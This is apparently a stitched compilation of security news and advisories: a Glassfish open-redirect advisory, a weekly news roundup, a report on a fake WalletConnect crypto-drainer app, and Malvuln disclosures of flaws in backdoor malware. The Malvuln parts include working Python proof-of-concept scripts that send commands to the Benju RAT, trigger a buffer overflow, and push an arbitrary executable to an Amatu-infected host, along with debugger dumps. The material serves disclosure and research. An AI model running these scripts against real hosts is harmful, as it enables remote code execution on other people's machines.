In Eclipse Glassfish versions before 7.0.17, the Host HTTP parameter could cause the web application to redirect to the specified URL, when the requested endpoint is `/management/domain`. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.

**Exploitability Metrics**

Attack Vector: This metric reflects the context by which vulnerability exploitation is possible. This metric value (and consequently the resulting severity) will be larger the more remote (logically, and physically) an attacker can be in order to exploit the vulnerable system. The assumption is that the number of potential attackers for a vulnerability that could be exploited from across a network is larger than the number of potential attackers that could exploit a vulnerability requiring physical access to a device, and therefore warrants a greater severity.

Attack Complexity: This metric captures measurable actions that must be taken by the attacker to actively evade or circumvent existing built-in security-enhancing conditions in order to obtain a working exploit. These are conditions whose primary purpose is to increase security and/or increase exploit engineering complexity. A vulnerability exploitable without a target-specific variable has a lower complexity than a vulnerability that would require non-trivial customization. This metric is meant to capture security mechanisms utilized by the vulnerable system.

Attack Requirements: This metric captures the prerequisite deployment and execution conditions or variables of the vulnerable system that enable the attack. These differ from security-enhancing techniques/technologies (ref Attack Complexity) as the primary purpose of these conditions is not to explicitly mitigate attacks, but rather, emerge naturally as a consequence of the deployment and execution of the vulnerable system.

Privileges Required: This metric describes the level of privileges an attacker must possess prior to successfully exploiting the vulnerability. The method by which the attacker obtains privileged credentials prior to the attack (e.g., free trial accounts), is outside the scope of this metric. Generally, self-service provisioned accounts do not constitute a privilege requirement if the attacker can grant themselves privileges as part of the attack.

User interaction: This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable system. This metric determines whether the vulnerability can be exploited solely at the will of the attacker, or whether a separate user (or user-initiated process) must participate in some manner.

**Vulnerable System Impact Metrics**

Confidentiality: This metric measures the impact to the confidentiality of the information managed by the VULNERABLE SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.

Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the VULNERABLE SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).

Availability: This metric measures the impact to the availability of the VULNERABLE SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.

**Subsequent System Impact Metrics**

Confidentiality: This metric measures the impact to the confidentiality of the information managed by the SUBSEQUENT SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.

Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the SUBSEQUENT SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).

Availability: This metric measures the impact to the availability of the SUBSEQUENT SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.

GHSA-jq3f-mfmg-747x: Eclipse Glassfish improperly handles http parameters

Plus: The US Justice Department indicts three Iranians over Trump campaign hack, EU regulators fine Meta $100 million for a password security lapse, and the Tor Project enters a new phase.

Researchers found a vulnerability in a Kia web portal that allowed them to track millions of cars, unlock doors, honk horns, and even start engines in seconds, just by reading the car's license plate. The findings are the latest in a string of web bugs that have impacted dozen of carmakers. Meanwhile, a handful of Tesla Cybertrucks have been outfitted for war and are literally being-battle tested by Chechen forces fighting in Ukraine as part of Russia’s ongoing invasion.

As Israel escalates its attacks on Lebanon, civilians on both sides of the conflict have been receiving ominous text messages—and authorities in each country are accusing the other of psychological warfare. The US government has increasingly condemned Russia-backed media outlets like RT for working closely with Russian intelligence—and many digital platforms have removed or banned their content. But they’re still influential and trusted alternative sources of information in many parts of the world.

And there's more. Each week, we round up the privacy and security news we didn’t cover in depth ourselves. Click the headlines to read the full stories. And stay safe out there.

**New Digital Identity Guidelines Strike Back at Dreadful Password Policies**

A new draft of the US National Institute of Standards and Technology's “Digital Identity Guidelines” finally takes steps to eliminate reviled password management practices that have been shown to do more harm than good. The recommendations, which will be mandatory for US federal government entities and serve as guidelines for everyone else, ban the practice of requiring users to periodically change their account passwords, often every 90 days.

The policy of regularly changing passwords evolved out of a desire to ensure that people weren't choosing easily guessable or reused passwords; but in practice, it causes people to choose simple or formulaic passwords so they will be easier to keep track of. The new recommendations also ban “composition rules,” like requiring a certain number or mix of capital letters, numbers, and punctuation marks in each password. NIST writes in the draft that the goal of the Digital Identity Guidelines is to provide “foundational risk management processes and requirements that enable the implementation of secure, private, equitable, and accessible identity systems.”

**DOJ Indicts Alleged Iranian Hackers Over Trump Campaign Breach**

The US Department of Justice unsealed charges on Friday against three Iranian men who allegedly compromised Donald Trump’s presidential campaign and leaked stolen data to media outlets. Microsoft and Google warned last month that an Iranian state-sponsored hacking group known as APT42 had targeted both the Joe Biden and Donald Trump presidential campaigns, and successfully breached the Trump campaign. The DOJ claims the hackers compromised a dozen people as part of its operation, including a journalist, a human rights advocate, and several former US officials. More broadly, the US government has said in recent weeks that Iran is attempting to interfere in the 2024 election.

“The defendants’ own words made clear that they were attempting to undermine former President Trump’s campaign in advance of the 2024 U.S. presidential election,” Attorney General Merrick Garland said at a press conference on Friday. "We know that Iran is continuing with its brazen efforts to stoke discord, erode confidence in the US electoral process, and advance its malign activities.”

**Irish Regulator Fines Meta More Than $100 Million Over 2019 Password Lapse**

The Irish Data Protection Commission fined Meta €91 million, or roughly $101 million, on Friday for a password storage lapse in 2019 that violated the European Union's General Data Protection Regulation. Following a report by Krebs on Security, the company acknowledged in March 2019 that a bug in its password management systems had caused hundreds of millions of Facebook, Facebook Lite, and Instagram passwords to be stored without protection in plaintext in an internal platform. Ireland's privacy watchdog launched its investigation into the incident in April 2019.

“It is widely accepted that user passwords should not be stored in plaintext, considering the risks of abuse that arise from persons accessing such data," Irish DPC deputy commissioner Graham Doyle said in a statement. “It must be borne in mind that the passwords, the subject of consideration in this case, are particularly sensitive, as they would enable access to users’ social media accounts.”

**The Tor Project and the Tails Privacy Operating System Are Merging**

The digital anonymity nonprofit the Tor Project is merging with privacy- and anonymity-focused Linux-based operating system Tails. Pavel Zoneff, the Tor Project’s communications director, wrote in a blog post on Thursday that the move will facilitate collaboration and reduce costs, while expanding both groups' reach. “Tor and Tails provide essential tools to help people around the world stay safe online,” he wrote. “By joining forces, these two privacy advocates will pool their resources to focus on what matters most: ensuring that activists, journalists, other at-risk and everyday users will have access to improved digital security tools.”

The US Could Finally Ban Inane Forced Password Changes

Cybersecurity researchers have discovered a malicious Android app on the Google Play Store that enabled the threat actors behind it to steal approximately $70,000 in cryptocurrency from victims over a period of nearly five months.
The dodgy app, identified by Check Point, masqueraded as the legitimate WalletConnect open-source protocol to trick unsuspecting users into downloading it.
"Fake

Cybersecurity researchers have discovered a malicious Android app on the Google Play Store that enabled the threat actors behind it to steal approximately $70,000 in cryptocurrency from victims over a period of nearly five months.

The dodgy app, identified by Check Point, masqueraded as the legitimate WalletConnect open-source protocol to trick unsuspecting users into downloading it.

"Fake reviews and consistent branding helped the app achieve over 10,000 downloads by ranking high in search results," the cybersecurity company said in an analysis, adding it's the first time a cryptocurrency drainer has exclusively targeted mobile device users.

Over 150 users are estimated to have fallen victim to the scam, although it's believed that not all users who downloaded the app were impacted by the cryptocurrency drainer.

The campaign involved distributing a deceptive app that went by several names such as "Mestox Calculator," "WalletConnect - DeFi & NFTs," and "WalletConnect - Airdrop Wallet" (co.median.android.rxqnqb).

While the app is no longer available for download from the official app marketplace, data from SensorTower shows that it was popular in Nigeria, Portugal, and Ukraine, and linked to a developer named UNS LIS.

The developer has also been associated with another Android app called "Uniswap DeFI" (com.lis.uniswapconverter) that remained active on the Play Store for about a month between May and June 2023. It's currently not known if the app had any malicious functionality.

However, both apps can be downloaded from third-party app store sources, once again highlighting the risks posed by downloading APK files from other marketplaces.

Once installed, the fake WallConnect app is designed to redirect users to a bogus website based on their IP address and User-Agent string, and if so, redirect them a second time to another site that mimics Web3Inbox.

Users who don't meet the required criteria, including those who visit the URL from a desktop web browser, are taken to a legitimate website to evade detection, effectively allowing the threat actors to bypass the app review process in the Play Store.

Besides taking steps to prevent analysis and debugging, the core component of the malware is a cryptocurrency drainer known as MS Drainer, which prompts users to connect their wallet and sign several transactions to verify their wallet.

The information entered by the victim in each step is transmitted to a command-and-control server (cakeserver\[.\]online) that, in turn, sends back a response containing instructions to trigger malicious transactions on the device and transfer the funds to a wallet address belonging to the attackers.

"Similar to the theft of native cryptocurrency, the malicious app first tricks the user into signing a transaction in their wallet," Check Point researchers said.

"Through this transaction, the victim grants permission for the attacker's address 0xf721d710e7C27323CC0AeE847bA01147b0fb8dBF (the 'Address' field in the configuration) to transfer the maximum amount of the specified asset (if allowed by its smart contract)."

In the next step, the tokens from the victim's wallet are transferred to a different wallet (0xfac247a19Cc49dbA87130336d3fd8dc8b6b944e1) controlled by the attackers.

This also means that if the victim does not revoke the permission to withdraw tokens from their wallet, the attackers can keep withdrawing the digital assets as soon as they appear without requiring any further action.

Check Point said it also identified another malicious app exhibiting similar features "Walletconnect | Web3Inbox" (co.median.android.kaebpq) that was previously available on Google Play Store in February 2024. It attracted more than 5,000 downloads.

"This incident highlights the growing sophistication of cybercriminal tactics, particularly in the realm of decentralized finance, where users often rely on third-party tools and protocols to manage their digital assets," the company noted.

"The malicious app did not rely on traditional attack vectors like permissions or keylogging. Instead, it used smart contracts and deep links to silently drain assets once users were tricked into using the app."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Crypto Scam App Disguised as WalletConnect Steals $70K in Five-Month Campaign

Backdoor.Win32.Benju.a malware suffers from a remote command execution vulnerability.  This is the 700th release of a malvuln finding.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/88922242e8805bfbc5981e55fdfadd71.txtContact: malvuln13@gmail.comMedia: x.com/malvuln Threat: Backdoor.Win32.Benju.aVulnerability: Unauthenticated Remote Command ExecutionFamily: BenjuType: PE32MD5: 88922242e8805bfbc5981e55fdfadd71SHA256: 7d34804173e09d0f378dfc8c9212fe77ff51f08c9d0b73d00a19b7045ddc1f0e Vuln ID: MVID-2024-0700Disclosure: 09/27/2024Description: The RAT listens on TCP ports 200 and 15000. Third-party adversaries who can reach an infected host, can execute commands made available by the malware. Commands are sent in Spanish, using netcat or telnet fails to run cmds after connecting as they send CRLFs e.g. "quitar\r\n" fails "quitar" succeeds. Therefore, we need a custom client to send commands to the Benju RAT.Reiniciado = rebootquitar = terminate backdoorcerrarsesion = shutdownEnciendemonitor = turn on monitorapagamonitor = monitor offOcultaiconos = hide iconsactivachat = open chat windowBloquearaton = block ratDesbloquearaton = unblock ratActivainicio = activate startcerrarsesion = logoutOcultaiconosConectadoOcultado los iconoscerrarsesionConectadoCerrado la sesion de windowsEnciendemonitorConectadoMonitor encendidoapagamonitorConectadoMonitor apagadoquitarConectadoPc desinfectadoExploit/PoC:from socket import *import time,sysCMD=["Reiniciado","Enciendemonitor","apagamonitor","Ocultaiconos","Activainicio",          "activachat","Bloquearaton","Desbloquearaton","cerrarsesion","quitar"]def chk_res(s):    res=""    while True:        res += s.recv(512).decode()        if res:            break    return resdef Benju_Over(MALWARE_HOST, PTR):        PORT=200    s=socket(AF_INET, SOCK_STREAM)    s.connect((MALWARE_HOST, PORT))    print(CMD[PTR])    s.send("".encode())    print(chk_res(s))    PAYLOAD= CMD[PTR]   #Don't send CRLFs    s.send(PAYLOAD.encode())    time.sleep(0.5)    print(chk_res(s))    s.close()    print("[*] Benju (over) Rat PoC by malvuln")if __name__=="__main__":    c=-1    if len(sys.argv) < 3:        print("[+] Benju (over) Rat PoC by malvuln")        print("[+] Greetz Edu_Braun_0day, Indoushka, Todd J")        print("[!] Usage: Infected IP, Command")        print("[-]=============================")        for x in CMD:            c+=1            print("[+] "+str(c) + " "+ x)            exit()    try:        MALWARE_HOST=sys.argv[1]        PTR=int(sys.argv[2])        if MALWARE_HOST and PTR:            Benju_Over(MALWARE_HOST, PTR)    except Exception as e:        print("[!] "+str(e))        exit()Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Benju.a MVID-2024-0700 Remote Command Execution

Backdoor.Win32.Prorat.jz malware suffers from a buffer overflow vulnerability.

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024  
Original source: https://malvuln.com/advisory/277f9a4db328476300c4da5f680902ea.txt  
Contact: malvuln13@gmail.com  
Media: x.com/malvuln 

Threat: Backdoor.Win32.Prorat.jz  
Vulnerability: Remote Stack Buffer Overflow (SEH)  
Description: The RAT listens on TCP ports 51100,5112,5110 and runs an FTP service. Prorat uses a vulnerable component in a secondary malware it drops on the victim system named "Netbot_Attacker VIP 6.0 Version korea.exe" MD5: 2168a606464c7fd016c260140a62815e. The dropped malware listens on TCP port 8080 and 80 on subsequent restarts. Third-party attackers who can reach an infected machine can send specially crafted sequential packetz to port 8080. This will trigger a stack buffer overflow overwriting the ECX, EIP registers and Structured Exception Handler (SEH).  
Family: Prorat  
Type: PE32  
MD5: 277f9a4db328476300c4da5f680902ea  
SHA256: 1134dffe52ea01f0d93a6889edd36620dbe9ee04224ad662e4f5463c4feb98a7   
Vuln ID: MVID-2024-0699  
Dropped files:  ~imsinst.exe, NetBot.ini  in  \AppData\Local\Temp directory.  
ASLR: False  
DEP: False  
CFG: False  
Safe SEH: False  
Disclosure: 09/27/2024

Memory Dump:  
(1974.354): Stack buffer overflow - code c0000409 (first/second chance not available)  
eax=00000000 ebx=00000000 ecx=41414141 edx=00000000 esi=00000000 edi=00000002  
eip=76fced3c esp=0703f8d0 ebp=0703f910 iopl=0         nv up ei pl nz ac po nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000212  
ntdll!ZwWaitForMultipleObjects+0xc:  
76fced3c c21400          ret     14h

0:008> .ecxr  
eax=00000000 ebx=04367000 ecx=41414141 edx=00000000 esi=04367000 edi=00406120  
eip=41414141 esp=0703ff80 ebp=0703ff94 iopl=0         nv up ei pl nz na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206  
41414141 ??              ???

0:008> !analyze -v  
*******************************************************************************  
*                                                                             *  
*                        Exception Analysis                                   *  
*                                                                             *  
*******************************************************************************

*** WARNING: Unable to verify checksum for Netbot_Attacker VIP 6.0 Version korea.exe  
*** ERROR: Module load completed but symbols could not be loaded for Netbot_Attacker VIP 6.0 Version korea.exe

FAULTING_IP:   
+2f  
41414141 ??              ???

EXCEPTION_RECORD:  0703fad0 -- (.exr 0x703fad0)  
ExceptionAddress: 41414141  
   ExceptionCode: c0000005 (Access violation)  
  ExceptionFlags: 00000008  
NumberParameters: 2  
   Parameter[0]: 00000000  
   Parameter[1]: 41414141  
Attempt to read from address 41414141

PROCESS_NAME:  Netbot_Attacker VIP 6.0 Version korea.exe

ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_PARAMETER1:  00000015

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

FAILED_INSTRUCTION_ADDRESS:   
+2f  
41414141 ??              ???

CONTEXT:  0703fb20 -- (.cxr 0x703fb20)  
eax=00000000 ebx=04367000 ecx=41414141 edx=00000000 esi=04367000 edi=00406120  
eip=41414141 esp=0703ff80 ebp=0703ff94 iopl=0         nv up ei pl nz na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206  
41414141 ??              ???  
Resetting default scope

READ_ADDRESS:  41414141 

FOLLOWUP_IP:   
+2f  
41414141 ??              ???

ADDITIONAL_DEBUG_TEXT:  Followup set based on attribute [Is_ChosenCrashFollowupThread] from Frame:[0] on thread:[PSEUDO_THREAD]

LAST_CONTROL_TRANSFER:  from 41414141 to 41414141

FAULTING_THREAD:  ffffffff

BUGCHECK_STR:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE_FILL_PATTERN_41414141_STACKIMMUNE

PRIMARY_PROBLEM_CLASS:  STACK_BUFFER_OVERRUN

DEFAULT_BUCKET_ID:  STACK_BUFFER_OVERRUN

IP_ON_HEAP:  41414141  
The fault address in not in any loaded module, please check your build's rebase  
log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may  
contain the address if it were loaded.

IP_IN_FREE_BLOCK: 41414141

FRAME_ONE_INVALID: 1

STACK_TEXT:    
00000000 00000000 unknown!netbot_attacker_vip_6.0_version_korea.exe+0x0

STACK_COMMAND:  .cxr 000000000703FB20 ; kb ; ** Pseudo Context ** ; kb

SYMBOL_NAME:  unknown!netbot_attacker_vip_6.0_version_korea.exe

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: unknown

IMAGE_NAME:  unknown

DEBUG_FLR_IMAGE_TIMESTAMP:  0

FAILURE_BUCKET_ID:  STACK_BUFFER_OVERRUN_c0000409_unknown!Unloaded

BUCKET_ID:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE_FILL_PATTERN_41414141_STACKIMMUNE_MISSING_GSFRAME_BAD_IP_unknown!netbot_attacker_vip_6.0_version_korea.exe

Followup: MachineOwner  
---------

0:008> !exchain  
0703f988: ntdll!_except_handler4+0 (76fd6a50)  
  CRT scope  0, func:   ntdll!RtlReportExceptionHelper+251 (770157ad)  
Invalid exception stack at 41414141

Exploit/PoC:  
from socket import *  
import time

MALWARE_HOST="x.x.x.x"  
PORT=8080  #80 after initial restart

def Prorat_BOF():

    print("[+] Backdoor.Win32.Prorat.jz")  
    print("[+] Remote Stack Buffer Overflow - SEH")  
    print("[+] MD5: 277f9a4db328476300c4da5f680902ea")

        for i in range(1, 13):  
        s=socket(AF_INET, SOCK_STREAM)  
        s.connect((MALWARE_HOST, PORT))  
        PAYLOAD="A"*100 * i  
        s.send(PAYLOAD.encode())  
        time.sleep(0.5)  
        print(len(PAYLOAD))  
        s.close()

if __name__=="__main__":  
    Prorat_BOF()  
    print("Malvuln")

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Prorat.jz MVID-2024-0699 Buffer Overflow

Backdoor.Win32.Amatu.a malware suffers from a remote arbitrary file write vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/1e2d0b90ffc23e00b743c41064bdcc6b.txtContact: malvuln13@gmail.comMedia: x.com/malvuln  Threat: Backdoor.Win32.Amatu.aVulnerability: Remote Arbitrary File Write (RCE)Family: AmatuType: PE32MD5: 1e2d0b90ffc23e00b743c41064bdcc6bSHA256: 77fff9931013ab4de6d4be66ca4fda47be37b6f706a7062430ee8133c7521297Vuln ID: MVID-2024-0698Dropped files: mine.exeDisclosure: 09/27/2024Description: The malware listens on TCP port 2121. Third-party adversaries who can reach an infected host, can write arbitrary executable code to a file named "mine.exe" to SysWOW64 directory. The mine.exe  PE file executes immediately and runs as a child of the parent process malware. Amatu calls several Win32 APIs "GetSystemDirectoryA", "CreateFileA" and "WriteFile" to save the inbound code to disk. Finally, it calls "ShellExecuteA" executing the arbitrary PE file sent by the attacker. Setup a gateway and fake DNS sinkhole to mimic outbound internet access for the C2 or the port may not open."Amatu.a" disassemblycall    ds:GetSystemDirectoryA004A1FCB                 lea     ecx, [ebp+Source]004A1FD1                 push    ecx             ; Source004A1FD2                 lea     edx, [ebp+Buffer]004A1FD8                 push    edx             ; Destination004A1FD9                 call    strcat004A1FDE                 add     esp, 8004A1FE1                 push    offset aMine    ; "mine"004A1FE6                 lea     eax, [ebp+Buffer]004A1FEC                 push    eax             ; Destination004A1FED                 call    strcat004A1FF2                 add     esp, 8004A1FF5                 push    offset aExe     ; ".exe"004A1FFA                 lea     ecx, [ebp+Buffer]004A2000                 push    ecx             ; Destination004A2001                 call    strcat004A2022                 call    ds:CreateFileA 004A206B                 call    recv.004A2070                 mov     [ebp+nNumberOfBytesToWrite], eax.004A2076                 cmp     [ebp+nNumberOfBytesToWrite], 0push    eax             ; lpNumberOfBytesWritten004A209C                 mov     ecx, [ebp+nNumberOfBytesToWrite]004A20A2                 push    ecx             ; nNumberOfBytesToWrite004A20A3                 lea     edx, [ebp+buf]004A20A9                 push    edx             ; lpBuffer004A20AA                 mov     eax, [ebp+hFile]004A20B0                 push    eax             ; hFile004A20B1                 call    ds:WriteFilemov     ecx, [ebp+hFile]004A20BF                 push    ecx             ; hObject004A20C0                 call    ds:CloseHandle004A20C6                 push    1               ; nShowCmd004A20C8                 push    0               ; lpDirectory004A20CA                 push    0               ; lpParameters004A20CC                 lea     edx, [ebp+Buffer]004A20D2                 push    edx             ; lpFile004A20D3                 push    offset Operation ; "open"004A20D8                 push    0               ; hwnd004A20DA                 call    ds:ShellExecuteA004A20E0                 mov     eax, [ebp+s]004A20E3                 push    eax             ; s004A20E4                 call    closesocketExploit/PoC:1) Create a small PE file named "mine.exe", I used MASM and packed it with FSG."mine.exe" include \masm32\include\masm32rt.inc.dataHATE db "Masm32:", 0MyReal8 REAL8 123.456.data?aDword dd ?.codestart:  invoke MessageBox, 0, chr$("DOOM!"), addr HATE, MB_OK  mov eax, 123  exitend start2) Our custom client to send "mine.exe" to the remote infected host.from socket import *MALWARE_HOST="x.x.x.x"PORT=2121DOOM="mine.exe" def doit():    s=socket(AF_INET, SOCK_STREAM)    s.connect((MALWARE_HOST, PORT))    f = open(DOOM, "rb")    EXE = f.read()    s.send(EXE)    while EXE:        s.send(EXE)        EXE=f.read()    s.close()    print("By Malvuln");if __name__=="__main__":    doit()Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Amatu.a MVID-2024-0698 Arbitrary File Write

Backdoor.Win32.Agent.pw malware suffers from a buffer overflow vulnerability.

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024  
Original source: https://malvuln.com/advisory/68dd7df213674e096d6ee255a7b90088.txt  
Contact: malvuln13@gmail.com  
Media: x.com/malvuln  

Threat: Backdoor.Win32.Agent.pw  
Vulnerability: Remote Stack Buffer Overflow (SEH)  
Description: The malware listens on TCP port 21111. Third-party attackers who can reach an infected machine can send specially crafted sequential packetz triggering a stack buffer overflow overwriting the ECX, EDI registers and Structured Exception Handler (SEH). Sending a packet containing the ascii character "A" or "41", registers are overwritten with "3431" as 4 is 34 hex and 1 is 31 hex. The lowercase character "R" consistently triggers an access violation with registers being overwritten with "r" 72 hex.  
Family: Agent  
Type: PE32  
MD5: 68dd7df213674e096d6ee255a7b90088  
SHA256: 2ba1d27325224407b6d57e0e8d141e3f301225d18a68bb5380c46287a0fc4441  
Vuln ID: MVID-2024-0697  
Dropped files:   
ASLR: False  
DEP: False  
CFG: False  
Safe SEH: False  
Disclosure: 09/27/2024

Memory Dump:  
(1f90.1888): Stack buffer overflow - code c0000409 (first/second chance not available)  
eax=00000000 ebx=00000000 ecx=72727272 edx=040b1a3c esi=00000000 edi=00000002  
eip=76fced3c esp=0019de98 ebp=0019ded8 iopl=0         nv up ei pl nz na po nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202  
ntdll!ZwWaitForMultipleObjects+0xc:  
76fced3c c21400          ret     14h

0:000> .ecxr  
eax=025806f0 ebx=00000150 ecx=72727272 edx=040b1a3c esi=00000000 edi=72727272  
eip=00411515 esp=0019e54c ebp=0019e56c iopl=0         nv up ei pl zr na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246  
Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+0x11515:  
00411515 897904          mov     dword ptr [ecx+4],edi ds:002b:72727276=????????

0:000> !analyze -v  
*******************************************************************************  
*                                                                             *  
*                        Exception Analysis                                   *  
*                                                                             *  
*******************************************************************************

FAULTING_IP:   
Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+11515  
00411515 897904          mov     dword ptr [ecx+4],edi

EXCEPTION_RECORD:  0019e09c -- (.exr 0x19e09c)  
ExceptionAddress: 00411515 (Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+0x00011515)  
   ExceptionCode: c0000005 (Access violation)  
  ExceptionFlags: 00000008  
NumberParameters: 2  
   Parameter[0]: 00000001  
   Parameter[1]: 72727276  
Attempt to write to address 72727276

PROCESS_NAME:  Backdoor.Win32.Agent.pw.68dd7df213674e096d6ee255a7b90088.exe

ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_PARAMETER1:  00000015

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

CONTEXT:  0019e0ec -- (.cxr 0x19e0ec)  
eax=025806f0 ebx=00000150 ecx=72727272 edx=040b1a3c esi=00000000 edi=72727272  
eip=00411515 esp=0019e54c ebp=0019e56c iopl=0         nv up ei pl zr na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246  
Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+0x11515:  
00411515 897904          mov     dword ptr [ecx+4],edi ds:002b:72727276=????????  
Resetting default scope

WRITE_ADDRESS:  72727276 

FOLLOWUP_IP:   
Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+11515  
00411515 897904          mov     dword ptr [ecx+4],edi

FAULTING_THREAD:  00001888

BUGCHECK_STR:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_STRING_DEREFERENCE_EXPLOITABLE_FILL_PATTERN_72727272

PRIMARY_PROBLEM_CLASS:  STACK_BUFFER_OVERRUN_EXPLOITABLE_FILL_PATTERN_72727272

DEFAULT_BUCKET_ID:  STACK_BUFFER_OVERRUN_EXPLOITABLE_FILL_PATTERN_72727272

LAST_CONTROL_TRANSFER:  from 0040c987 to 00411515

STACK_TEXT:    
WARNING: Stack unwind information not available. Following frames may be wrong.  
0019e56c 0040c987 025805a8 0000003f 0019e5bc Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+0x11515  
0019e768 72727272 72727272 72727272 72727272 Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+0xc987  
0019e76c 72727272 72727272 72727272 72727272 0x72727272  
0019e770 72727272 72727272 72727272 72727272 0x72727272  
0019e774 72727272 72727272 72727272 72727272 0x72727272  
0019e778 72727272 72727272 72727272 72727272 0x72727272  
0019e77c 72727272 72727272 72727272 72727272 0x72727272  
0019e780 72727272 72727272 72727272 72727272 0x72727272  
0019e784 72727272 72727272 72727272 72727272 0x72727272  
0019e788 72727272 72727272 72727272 72727272 0x72727272  
0019e78c 72727272 72727272 72727272 72727272 0x72727272  
0019e790 72727272 72727272 72727272 72727272 0x72727272  
0019e794 72727272 72727272 72727272 72727272 0x72727272  
0019e798 72727272 72727272 72727272 72727272 0x72727272  
0019e79c 72727272 72727272 72727272 72727272 0x72727272  
0019e7a0 72727272 72727272 72727272 72727272 0x72727272  
0019e7a4 72727272 72727272 72727272 72727272 0x72727272  
0019e7a8 72727272 72727272 72727272 72727272 0x72727272  
0019e7ac 72727272 72727272 72727272 72727272 0x72727272  
